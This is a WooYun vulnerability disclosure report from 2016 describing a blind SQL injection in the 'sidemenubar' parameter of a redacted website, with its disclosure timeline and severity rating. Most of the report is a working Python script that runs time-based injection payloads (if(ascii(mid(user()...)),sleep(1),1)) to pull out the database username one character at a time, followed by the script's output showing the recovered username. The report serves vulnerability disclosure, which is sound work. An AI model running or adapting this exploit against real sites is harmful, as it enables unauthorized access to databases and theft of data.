乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-13: 厂商已经确认,细节仅向厂商公开 2016-01-23: 细节向核心白帽子及相关领域专家公开 2016-02-02: 细节向普通白帽子公开 2016-02-12: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
注入点:
http://**.**.**.**/modules.php?page=%E8%A1%8C%E6%94%BF%E4%BA%BA%E5%93%A1&sidemenubar=2,2
sidemenubar参数存在布尔型注入:============================================正常情况和and 1=1 返回
不正常情况,单引号和and 1=2返回
付验证脚本:
import requestsimport reimport timepayloads='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789@_.'user=''print 'Start to retrive Mysql user:'for i in range(1,23): for payload in payloads: starttime=time.time() s="19 and if(ascii(mid(user() from (%s) for 1))=%s,sleep(1),1)" %(i,ord(payload)) param={'sidemenubar':s} response=requests.get('http://**.**.**.**/modules.php?page=%E8%A1%8C%E6%94%BF%E4%BA%BA%E5%93%A1&sidemenubar=2,2',params=param) if time.time()-starttime >2: user+=payload print '\n user is:',user, break else: print '.',print '\n[Done] mysql user is %s' %user
返回结果,仅供验证存在注入
C:\Users\Administrator>python C:\Users\Administrator\Desktop\223.pyStart to retrive Mysql user: user is: A . . . . . . . . . . . . . . user is: AO . . . user is: AOD . . . . . . . . user is: AODI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . user is: AODI1 . . user is: AODI1C . . . . user is: AODI1CE . user is: AODI1CEB . . user is: AODI1CEBC user is: AODI1CEBCA user is: AODI1CEBCAA . . . . . . . . . . . . . . user is: AODI1CEBCAAO user is: AODI1CEBCAAOA user is: AODI1CEBCAAOAA . . . . . . . . . . . user is: AODI1CEBCAAOAAL . user is: AODI1CEBCAAOAALB . . . user is: AODI1CEBCAAOAALBD . . user is: AODI1CEBCAAOAALBDC . user is: AODI1CEBCAAOAALBDCB . . . user is: AODI1CEBCAAOAALBDCBD . . . user is: AODI1CEBCAAOAALBDCBDD . . . . . . . . user is: AODI1CEBCAAOAALBDCBDDI[Done] mysql user is AODI1CEBCAAOAALBDCBDDI
危害等级:高
漏洞Rank:16
确认时间:2016-01-13 16:46
感謝通報
暂无